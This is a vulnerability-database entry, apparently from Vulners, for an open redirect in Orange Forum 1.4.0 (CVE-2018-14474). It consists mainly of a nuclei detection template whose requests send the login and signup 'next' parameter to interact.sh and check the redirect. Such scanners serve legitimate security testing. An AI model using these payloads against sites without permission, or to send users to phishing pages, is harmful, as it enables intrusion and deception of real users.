Lucene search
K

Orange Forum 1.4.0 - Open Redirect

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Orange Forum 1.4.0 contains an open redirect vulnerability allowing attackers to redirect users to malicious sites, leading to phishing attacks or malware installation

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2018-14474
20 Jul 201818:00
cve
Cvelist
CVE-2018-14474
20 Jul 201818:00
cvelist
EUVD
EUVD-2018-6391
7 Oct 202500:30
euvd
NVD
CVE-2018-14474
20 Jul 201818:29
nvd
Packet Storm
OrangeForum 1.4.0 Open Redirection
9 Jan 201900:00
packetstorm
Prion
Open redirect
20 Jul 201818:29
prion
RedhatCVE
CVE-2018-14474
22 May 202509:11
redhatcve
Veracode
Open Redirect
23 Jul 201807:58
veracode
id: CVE-2018-14474

info:
  name: Orange Forum 1.4.0 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: |
    Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability.
  reference:
    - https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
    - https://seclists.org/fulldisclosure/2019/Jan/32
    - https://vuldb.com/?id.122045
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14474
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-14474
    cwe-id: CWE-601
    epss-score: 0.02257
    epss-percentile: 0.80732
    cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: goodoldweb
    product: orange_forum
  tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
      - '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'

    stop-at-first-match: true
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a004730450220245c51160c81819a31196475ff71bfb46124c3b10ab6453c55e0842fdd60c2ff022100804931205dd0ef698eae8eff22c43d1bd2aea57822da956d01ef5d3ba16e737c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25.8
CVSS 36.1
EPSS0.02257
16